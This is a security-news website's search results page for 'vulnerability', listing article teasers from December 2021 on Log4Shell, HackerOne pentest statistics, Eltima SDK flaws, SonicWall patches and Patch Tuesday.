Search results for: vulnerability

Log4j

The Log4j JNDI attack and how to prevent it

The disclosure of the critical Log4Shell (CVE-2021-44228) vulnerability and the release of first one and than additional PoC exploits has been an unwelcome surprise for the entire information security community, but most of all those who are tasked with keeping enterprise systems and network secure. The timing of it all could be worse – it could have happened on Christmas Eve, for example – but the news hitting on a Thursday evening/Friday in the run-up … More

Log4j

Log4Shell update: Attack surface, attacks in the wild, mitigation and remediation

Several days have passed since the dramatic reveal of CVE-2021-44228 (aka Log4Shell), an easily exploitable (without authentication) RCE flaw in Apache Log4j, a popular open-source Java-based logging utility that’s seemingly used by most enterprise applications out there. The existence of the vulnerability and the public release of PoCs exploiting it have made this weekend a nightmare for those that are tasked with mitigating its fallout and keeping company systems and networks secure. Log4Shell update: What … More

Hand

Hacker-powered pentests gaining momentum

Hackers have reported over 66,000 valid vulnerabilities this year – over 20% more than 2020 – with hacker-powered pentests seeing a 264% increase in reported vulnerabilities, HackerOne has announced. Pandemic-led digital transformation and cloud migration continue to create vulnerabilities as attack surfaces expand and services are outsourced. This year’s report revealed bounty prices for high and critical vulnerabilities are rising as organizations prioritize high-impact bugs. Businesses are also remediating vulnerabilities faster than ever as vulnerability … More

week in review

Week in review: Apache Log4j 0day exploited, Kali Linux 2021.4 released, Patch Tuesday forecast

Here’s an overview of some of last week’s most interesting news, articles and interviews: Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228) A critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being leveraged by attackers in the wild. Kali Linux 2021.4 released: Wider Samba compatibility, The Social-Engineer Toolkit, new tools, and more! Offensive Security released Kali Linux 2021.4, which comes with a number of improvements: … More

Log4j

Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228)

A critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being leveraged by attackers in the wild – for now, fortunately, primarily to deliver coin miners. Reported to the Apache Software Foundation by Chen Zhaojun of Alibaba Cloud Security Team, the bug has now apparently been fixed in Log4j v2.15.0, just as a PoC has popped up on GitHub and there are reports that attackers are already attempting to compromise … More

cloud

Vulnerabilities in Eltima SDK affect popular cloud desktop and USB sharing services

SentinelOne researchers have unearthed a number of privilege escalation vulnerabilities in Eltima SDK, a library used by many cloud desktop and USB sharing services like Amazon Workspaces, NoMachine and Accops to allow users to connect and share local devices over network. “These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded,” the researchers shared. The vulnerabilities affect both the cloud … More

Microsoft

Microsoft vulnerabilities have grave implications for organizations of all sizes

Microsoft software products are a connective tissue of many organizations, from online documents (creating, sharing, storing), to email and calendaring, to the operating systems that enable business operations on the front and back ends, both in the cloud and on premises. Over 1 million companies worldwide and over 731,000 companies in the U.S. use Office 365, and though Microsoft offers no hard stats, some sources suggest there are over 90,000 Microsoft partners facilitating services and … More

patch

December 2021 Patch Tuesday forecast: How do you stack up?

I can’t believe that the end of 2021 is already in sight, and looking backwards, I have to say we’ve had our share of interesting events. If I had to characterize it from a security perspective, I’d say this is the year of supply chain attacks. Prior to January, most of us had rarely heard that term, but then Solarwinds, Kaseya, and others were in the news and we heard it throughout the year. Striking … More

security platform

Skybox Security’s network modeling mitigates critical infrastructure security risks

Skybox Security announced new vulnerability management capabilities for operational technology (OT) environments. Available now, the new Skybox Security Posture Management Platform capabilities eliminate cyber exposure across the entire enterprise environment, including IT, hybrid, multi-cloud, and now OT assets. “There is no single solution that will stop cyberattacks, and OT environments are particularly vulnerable. IT/OT convergence demands flexible and vendor-agnostic attack surface modeling to reduce critical cybersecurity risks,” said Haggai Polak, chief product officer, Skybox Security. … More

Appointments

HackerOne appoints Chris Evans as CISO

HackerOne announced the appointment of Chris Evans as Chief Information Security Officer (CISO). A pillar of the security industry, Chris Evans, will also hold the newly created role of Chief Hacking Officer. The Chief Hacking Officer role will give hackers an additional seat at the table at HackerOne, with Chris collaborating with the community to deliver their point of view in executive level discussions. The role will also advise and support organizations with best practices … More

SonicWall

It’s time to patch your SonicWall SMA 100 series appliances again!

SonicWall has fixed a handful of vulnerabilities affecting its SMA 100 series appliances and is urging organizations to implement the patches as soon as possible. Although there’s currently no evidence of these bugs being exploited in active attacks, threat actors have been known to target these appliances in the past by leveraging known and zero-day vulnerabilities. About the vulnerabilities The patched vulnerabilities, which were reported by Jake Baines of Rapid7 and Richard Warren of NCC … More

risk

Extracting value from the interconnected network of risk management

From the CISO to the SOC operator, defenders struggle to maintain complete situational awareness. Holistic approaches to risk management require the implementation of a manageable number of policies and procedures but are tied to an often unmanageable and misunderstood ecosystem of tooling and controls. These inefficiencies are laid bare in frequent public breach reports and are the result of a threat landscape that is increasing in volume, complexity, and novelty. We fail to leverage the … More